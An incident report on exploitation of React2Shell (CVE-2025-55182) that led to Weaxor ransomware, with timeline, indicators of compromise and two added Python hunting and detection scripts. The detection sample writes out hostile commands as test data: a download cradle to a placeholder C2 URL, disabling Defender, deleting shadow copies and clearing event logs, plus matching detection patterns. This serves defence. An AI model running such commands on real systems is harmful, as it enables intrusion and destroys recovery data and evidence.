# Full Report
Immediately after the threat actor gained access to our client’s network on 5 December 2025, they ran an obfuscated PowerShell command, which established command and control (C2) by downloading a Cobalt Strike PowerShell stager and installing a beacon that called back to their remote infrastructure. After this, the threat actor disabled real-time protection on Windows Defender Antivirus to prepare the environment for secondary payloads. The ransomware binary was dropped and executed on the system in under one minute from initial access. Recovery notes titled "RECOVERY INFORMATION.txt" were created in multiple directories. Encrypted files were given the file extension “.weax”. After ransomware detonation, a text file was also created on disk which included the public IP address of the target. This was likely sent back to the threat actor’s C2 server. As a defence evasion tactic, event logs were cleared, and volume shadow copies were deleted.
# Analysis Summary
# Incident Report: React2Shell Exploitation Leading to Weaxor Ransomware Deployment
## Executive Summary
A financially motivated threat actor exploited the critical React2Shell vulnerability (CVE-2025-55182) to gain immediate access to a corporate network on December 5, 2025. The attacker rapidly deployed Weaxor ransomware within a minute of access, encrypting files on the initially compromised server. While defense evasion tactics were employed (log clearing, shadow copy deletion), the attack scope remained limited to the vulnerable web server; no lateral movement or data exfiltration was observed.
## Incident Details
- **Discovery Date:** Not specified, but the report was published on 16 December 2025.
- **Incident Date:** 5 December 2025 (Initial Access).
- **Affected Organization:** Client utilizing a system vulnerable to React2Shell.
- **Sector:** Not specified (Inferred: Organization using public-facing web applications powered by React/Next.js).
- **Geography:** Not specified.
## Timeline of Events
### Initial Access
- **Date/Time:** 5 December 2025 (all subsequent activity began immediately after access was gained).
- **Vector:** Exploitation of the **React2Shell vulnerability (CVE-2025-55182)** via a malicious HTTP request targeting React Server Components (RSC)/Flight Protocol.
- **Details:** The threat actor established an initial foothold with remote code execution on the web server.
### Command and Control Establishment & Payload Staging
- **Date/Time:** Within seconds of initial access.
- **Vector:** Obfuscated PowerShell command execution.
- **Details:**
1. Downloaded and executed a **Cobalt Strike PowerShell stager**.
2. Installed a **Cobalt Strike beacon** communicating with remote C2 infrastructure.
3. Disabled **real-time protection on Windows Defender Antivirus**.
4. Ran the `whoami` command for discovery (evidence likely obscured by log clearing).
### Ransomware Deployment & Impact
- **Date/Time:** Less than one minute after initial access.
- **Vector:** Execution of secondary payload.
- **Details:**
1. **Weaxor ransomware binary (ZQyfcAJ.exe)** was dropped and executed.
2. Files were encrypted and renamed with the extension **“.weax”**.
3. **"RECOVERY INFORMATION.txt"** notes were created in multiple directories.
4. A text file containing the **target's public IP address** was created and likely sent back to the attacker C2.
### Defense Evasion & Clean-up
- **Date/Time:** Concurrent with or immediately after ransomware detonation.
- **Vector:** System modification.
- **Details:**
1. **Event logs were cleared.**
2. **Volume shadow copies were deleted.**
### Lateral Movement
- **Status:** **None observed.** The scope of compromise was limited to the single vulnerable web server.
### Data Exfiltration/Impact
- **Status:** **No evidence of data exfiltration attempted.**
- **Impact:** Operational impact confined to denial of service on the affected server due to file encryption.
### Detection & Response
- **Discovery:** Details not provided, but an investigation team (S-RM) responded post-incident.
- **Response actions taken:** Not detailed in the provided text beyond identification of the IOCs and the nature of the attack.
## Attack Methodology
| Category | Technique Used |
| :--- | :--- |
| **Initial Access** | Exploitation of **React2Shell (CVE-2025-55182)**. |
| **Persistence** | Installation of a **Cobalt Strike beacon**. |
| **Privilege Escalation** | Code executed with the privileges of the user running the web server, potentially resulting in **highly privileged access** (implied). |
| **Defense Evasion** | Disabled **Windows Defender Real-Time Protection**; **Cleared Event Logs**; **Deleted Volume Shadow Copies**. |
| **Credential Access** | Not explicitly mentioned/observed prior to ransomware execution. |
| **Discovery** | Execution of the **`whoami`** command. |
| **Lateral Movement** | None observed. |
| **Collection** | Not explicitly mentioned/observed. |
| **Exfiltration** | None observed. |
| **Impact** | Deployment and execution of **Weaxor ransomware** (Mallox strain). |
## Impact Assessment
- **Financial:** Not specified, potentially involving remediation costs and downtime for the affected server.
- **Data Breach:** No evidence suggests data was exfiltrated.
- **Operational:** Service disruption limited to the single vulnerable web server due to encryption.
- **Reputational:** Not specified.
## Indicators of Compromise
- **Network-based IOCs:**
  - C2 IP Address: `23.235.188[.]3`
  - Ransomware Connection IP: `193.143.1[.]153` (Port 80)
  - Other Cobalt Strike/Payload IPs: `45.221.113[.]96`, `45.221.114[.]250`, `43.156.70[.]172`, `45.194.22[.]139`, `38.47.103[.]117`
- **File-based IOCs:**
  - Ransomware Binary: `ZQyfcAJ.exe` (SHA1: `f6083acf5fde12d17fb5b3098242e92a48cbf122`)
  - C2 Payload: `Agtisx.exe` (SHA1: `05f4407eb2e413c3babdc3054e6db032cadc51b2`)
  - Ransom Note: `RECOVERY INFORMATION.txt`
  - Evidence File: `weax.txt` (containing the target's public IP)
- **Behavioral IOCs:**
  - Deobfuscated PowerShell command using `IEX (New-Object System[.]Net[.]Webclient).DownloadString(...)`.
  - Processes spawned from the Node/React web server context executing system commands.
  - User Access Logs recording a 'File Server' connection from `127.0.0.1` associated with the vulnerable process user account near the time of access.
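The script below is an added example for hunting the file-based and network indicators listed above; it is not tooling from S-RM or the report. The SHA-1 hashes, file names, extension and defanged IPs are copied from the IOC list; the directory tree it scans is constructed in `build_sample_tree()` so the script runs offline (the hash-match branch therefore produces no hit on the sample tree, since no file with the listed hashes is created).

```python
"""Hunt a file tree for the Weaxor artefacts listed in the report's IOC section.

Added example, not the report's own tooling. Indicators are taken from the
report; the sample tree and the firewall export line are constructed here.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# File-based indicators from the report.
KNOWN_SHA1 = {
    "f6083acf5fde12d17fb5b3098242e92a48cbf122": "ZQyfcAJ.exe (Weaxor ransomware binary)",
    "05f4407eb2e413c3babdc3054e6db032cadc51b2": "Agtisx.exe (Cobalt Strike payload)",
}
RANSOM_NOTE = "RECOVERY INFORMATION.txt"
ENCRYPTED_EXT = ".weax"
EVIDENCE_FILE = "weax.txt"

# Network indicators, kept defanged exactly as the report lists them.
DEFANGED_IPS = [
    "23.235.188[.]3", "193.143.1[.]153", "45.221.113[.]96", "45.221.114[.]250",
    "43.156.70[.]172", "45.194.22[.]139", "38.47.103[.]117",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('1.2.3[.]4') back into a matchable string."""
    return indicator.replace("[.]", ".")


def sha1_of(path: Path) -> str:
    """Stream the file through SHA-1 so large files never land in memory whole."""
    digest = hashlib.sha1()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hunt(root: Path) -> list:
    """Walk `root` and return sorted (relative POSIX path, reason) pairs for every hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if name == RANSOM_NOTE:
                findings.append((rel, "ransom note"))
            elif name == EVIDENCE_FILE:
                findings.append((rel, "weax.txt evidence file (public IP)"))
            elif path.suffix == ENCRYPTED_EXT:
                findings.append((rel, "file encrypted by Weaxor"))
            else:
                # Only hash files that did not already match by name/extension.
                label = KNOWN_SHA1.get(sha1_of(path))
                if label:
                    findings.append((rel, f"hash match: {label}"))
    return sorted(findings)


def find_c2_hits(text: str) -> list:
    """Return the report's C2/payload IPs (defanged form) that occur in a text export."""
    return [ip for ip in DEFANGED_IPS if refang(ip) in text]


def build_sample_tree() -> Path:
    """Construct a small tree imitating the post-detonation state described in the report."""
    root = Path(tempfile.mkdtemp(prefix="weax-hunt-"))
    (root / "inetpub" / "app").mkdir(parents=True)
    (root / "Users" / "svc").mkdir(parents=True)
    (root / "inetpub" / "app" / "config.json.weax").write_bytes(b"\x00constructed ciphertext\x00")
    (root / "inetpub" / "app" / RANSOM_NOTE).write_text("constructed note\n")
    (root / "Users" / "svc" / RANSOM_NOTE).write_text("constructed note\n")
    # TEST-NET-3 address standing in for the victim's public IP.
    (root / "Users" / "svc" / EVIDENCE_FILE).write_text("203.0.113.7\n")
    (root / "inetpub" / "app" / "server.js").write_text("console.log('benign');\n")
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    for rel, reason in hunt(tree):
        print(f"{reason:40s} {rel}")
    # Constructed firewall export line containing one of the report's IPs.
    print(find_c2_hits("2025-12-05 10:00:01 ALLOW TCP 10.0.0.5:51234 -> 193.143.1.153:80"))
```

Run it against a mounted image or a live host by passing the root of interest to `hunt()`; name and extension checks are cheap and run first, and only files that miss those checks are hashed.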
## Response Actions
- **Containment Measures:** (Implied) Isolation of the compromised web server.
- **Eradication Steps:** (Implied) Removal of Cobalt Strike beacon, C2 activity, and the Weaxor binary.
- **Recovery Actions:** (Implied) Restoration of encrypted files from backups (as no mention of failure to recover was made).
## Lessons Learned
- The React2Shell vulnerability enabled extremely rapid deployment of ransomware, moving from initial access to encryption in under one minute, indicating potential full automation.
- Financially motivated groups are now actively targeting newly disclosed critical vulnerabilities (like CVE-2025-55182); exploitation is no longer confined to nation-state actors or cryptomining operations.
- Log clearing and shadow copy deletion are standard components of the toolkit used by Weaxor operators to hinder forensic investigation.
## Recommendations
1. **Immediate Patching:** Prioritize patching all systems vulnerable to CVE-2025-55182 (React Server Components/Next.js).
2. **Monitor Web Server Process Execution:** Implement strict monitoring for anomalous process creation (especially PowerShell execution) originating from web application runtime environments (Node/React processes).
3. **Enhance EDR/AV Coverage:** Ensure real-time protection mechanisms are resilient against targeted disabling attempts prior to payload deployment.
4. **Review Backup Integrity:** Verify the recoverability and offline status of backups, especially given the immediate deletion of volume shadow copies.
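The detection logic below is an added example for Recommendation 2 and the behavioral IOCs above; it is not from the report or from S-RM. It evaluates a handful of constructed, Sysmon-style process-creation records (field names `UtcTime`, `Computer`, `ParentImage`, `Image`, `CommandLine` are assumed) against rules for each step the report describes: a Node web runtime spawning a shell, an `IEX ... DownloadString` cradle (including one hidden behind `-EncodedCommand`), Defender real-time protection being switched off, shadow copy deletion and event log clearing. Several rules firing on one host inside a short window are escalated, which is what the sub-one-minute chain in this incident looks like. The stager URL in the sample is a placeholder, not an indicator from the report.

```python
"""Flag the Weaxor process chain in constructed process-creation events.

Added example, not the report's or S-RM's detection content. Event field
names follow Sysmon Event ID 1 by assumption; the events themselves are
constructed below, with a placeholder URL in place of any real C2.
"""
import base64
import re
from datetime import datetime, timedelta

WEB_RUNTIMES = {"node.exe", "node"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows or POSIX image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand/-enc, else the raw command line."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


# Each rule sees the event and the (decoded) script text.
RULES = [
    ("web runtime spawned shell",
     lambda e, s: image_name(e["ParentImage"]) in WEB_RUNTIMES and image_name(e["Image"]) in SHELLS),
    ("download cradle (IEX/DownloadString)",
     lambda e, s: re.search(r"downloadstring|\biex\b|invoke-expression", s, re.I) is not None),
    ("Defender real-time protection disabled",
     lambda e, s: re.search(r"set-mppreference.*disablerealtimemonitoring", s, re.I) is not None),
    ("shadow copies deleted",
     lambda e, s: re.search(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete", s, re.I) is not None),
    ("event logs cleared",
     lambda e, s: re.search(r"wevtutil(?:\.exe)?\s+cl\b|clear-eventlog", s, re.I) is not None),
]


def evaluate(events: list, window_seconds: int = 120):
    """Return (hits, alerts): per-event rule hits and one alert per host with a severity."""
    hits = []
    for e in events:
        script = decode_encoded_command(e["CommandLine"])
        for name, pred in RULES:
            if pred(e, script):
                hits.append({"time": e["UtcTime"], "host": e["Computer"], "rule": name})
    alerts = []
    for host in sorted({h["host"] for h in hits}):
        host_hits = sorted((h for h in hits if h["host"] == host), key=lambda h: h["time"])
        first = datetime.fromisoformat(host_hits[0]["time"])
        last = datetime.fromisoformat(host_hits[-1]["time"])
        rules = sorted({h["rule"] for h in host_hits})
        # Three or more distinct steps inside the window is the automated chain seen here.
        chained = len(rules) >= 3 and (last - first) <= timedelta(seconds=window_seconds)
        alerts.append({"host": host, "severity": "critical" if chained else "medium", "rules": rules})
    return hits, alerts


def build_sample_events() -> list:
    """Constructed events mirroring the report's sequence, plus benign noise."""
    cradle = "IEX (New-Object System.Net.WebClient).DownloadString('http://C2-PLACEHOLDER/stager.ps1')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode()
    return [
        {"UtcTime": "2025-12-05T10:00:00", "Computer": "WEB01", "ParentImage": r"C:\app\node.exe",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": f"powershell.exe -nop -w hidden -enc {enc}"},
        {"UtcTime": "2025-12-05T10:00:05", "Computer": "WEB01", "ParentImage": r"C:\...\powershell.exe",
         "Image": r"C:\...\powershell.exe",
         "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
        {"UtcTime": "2025-12-05T10:00:40", "Computer": "WEB01", "ParentImage": r"C:\...\powershell.exe",
         "Image": r"C:\Users\svc\ZQyfcAJ.exe", "CommandLine": "ZQyfcAJ.exe"},
        {"UtcTime": "2025-12-05T10:00:45", "Computer": "WEB01", "ParentImage": r"C:\Users\svc\ZQyfcAJ.exe",
         "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
        {"UtcTime": "2025-12-05T10:00:50", "Computer": "WEB01", "ParentImage": r"C:\Users\svc\ZQyfcAJ.exe",
         "Image": r"C:\Windows\System32\wevtutil.exe", "CommandLine": "wevtutil.exe cl Security"},
        # Benign: a build server running node under node, and an interactive cmd.
        {"UtcTime": "2025-12-05T10:01:00", "Computer": "BUILD02", "ParentImage": r"C:\app\node.exe",
         "Image": r"C:\app\node.exe", "CommandLine": "node build.js"},
        {"UtcTime": "2025-12-05T10:01:10", "Computer": "BUILD02", "ParentImage": r"C:\Windows\explorer.exe",
         "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    ]


if __name__ == "__main__":
    hits, alerts = evaluate(build_sample_events())
    for h in hits:
        print(h["time"], h["host"], h["rule"])
    for a in alerts:
        print(a)
```

The first rule alone (a web runtime spawning PowerShell or cmd) is the one worth deploying as a standing alert on any server running Node/React, since in this incident it fired seconds before anything else; the later rules add confidence and severity rather than being the first signal.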